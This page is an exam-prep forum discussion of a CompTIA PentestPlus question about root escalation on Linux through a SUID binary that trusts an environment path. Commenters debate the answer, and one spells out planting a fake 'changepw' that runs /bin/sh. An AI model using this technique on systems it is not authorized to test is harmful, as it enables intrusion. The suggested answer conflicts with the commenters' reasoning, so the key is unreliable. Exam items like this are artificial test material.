ExamTopics Logo
Mail Us[email protected]
Menu
Comptia Discussions
exam questions

Exam PT0-001 All Questions

View all questions & answers for the PT0-001 exam
Go to Exam

Exam PT0-001 topic 1 question 46 discussion

Actual exam question from CompTIA's PT0-001
Question #: 46
Topic #: 1
[All PT0-001 Questions]

After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a user's home folder titled ''changepass.`
-sr-xr-x 1 root root 6443 Oct 18 2017 /home/user/changepass
Using `strings" to print ASCII printable characters from changepass, the tester notes the following:
$ strings changepass
exit
setuid
strcmp

GLIBC_2.0 -

ENV_PATH -
%s/changepw
malloc
strlen
Given this information, which of the following is the MOST likely path of exploitation to achieve root privileges on the machine?

  • A. Copy changepass to a writable directory and export the ENV_PATH environmental variable to the path of a token-stealing binary titled changepw. Then run changepass.
  • B. Create a copy of changepass in the same directory, naming it changepw. Export the ENV_PATH environmental variable to the path '/home/user/'. Then run changepass.
  • C. Export the ENV_PATH environmental variable to the path of a writable directory that contains a token-stealing binary titled changepw. Then run changepass.
  • D. Run changepass within the current directory with sudo after exporting the ENV_PATH environmental variable to the path of '/usr/local/bin'.
Show Suggested Answer Hide Answer
Suggested Answer: D 🗳️
by phatboy at Dec. 10, 2019, 3 p.m.

Comments

Chosen Answer:
This is a voting comment (?). It is better to Upvote an existing comment if you don't have anything to add.
Switch to a voting comment New
Submit Cancel
kloug
2 years, 2 months ago
cccccccccc
upvoted 1 times
...
miabe
2 years, 9 months ago
Selected Answer: C
looks good to me
upvoted 1 times
...
versun
3 years, 10 months ago
Answer is C
upvoted 4 times
...
dyers
3 years, 12 months ago
there must be mistakes in the wording of the answers, but this explains what you're trying to do here, it's clearly a suid exploit with a script that calls another binary. Since the script isn't using an absolute path, adding a path writable by the non priv user and putting a changepw that's really just /bin/sh will get you root when you run the changepass script that has suid set. https://micrictor.github.io/Exploiting-Setuid-Programs/ So C or D, it's not super clear.
upvoted 2 times
...
TestBanger
4 years, 5 months ago
D: by remapping the relative path of the env_path you transfer/escalate your authority because the system already trusts any path for the env_path variable
upvoted 4 times
...
mr_robot
5 years ago
I would go for D. - https://www.pentestpartners.com/security-blog/exploiting-suid-executables/
upvoted 2 times
mr_robot
4 years, 10 months ago
The tester needs to create another dodgy copy of changepw script and move it to another directory (ex: \tmp) and not changepass initial executable. Export ENV_PATH to the chosen diretory of the dodgy script (ex:\temp) and then run changepass executable. "ChangePW is a freeware command line tool to set a password, display the current userAccountControl password flags, and enable or disable an account." https://www.itprotoday.com/compute-engines/jsi-tip-9267-changepw-freeware-command-line-tool-set-password-display-current
upvoted 4 times
NoImDirtyDan
4 years, 9 months ago
C is what you are describing.
upvoted 7 times
...
TitoChuz
3 years, 2 months ago
The site you mention is changing the writable directory to the "/temp" and as I understand this explains C
upvoted 1 times
...
...
...
phatboy
5 years, 4 months ago
How can the attacker run a command with sudo if they only have low-privilege access?
upvoted 2 times
Marshmallow
5 years, 3 months ago
The SUID is set for the write permission and that's how the user can do SUDO.
upvoted 4 times
TheABC
3 years, 5 months ago
Yes correct
upvoted 1 times
...
...
Evens_chokoe
5 years, 2 months ago
the attacker is running sudo just for Privilege escalation technique
upvoted 2 times
...
...
Community vote distribution
A (35%)
C (25%)
B (20%)
Other
Most Voted
A voting comment increases the vote count for the chosen answer by one.

Upvoting a comment with a selected answer will also increase the vote count towards that answer by one. So if you see a comment that you already agree with, you can upvote it instead of posting a new comment.

SaveCancel
exam
Someone Bought Contributor Access for:
SY0-701
London, 1 minute ago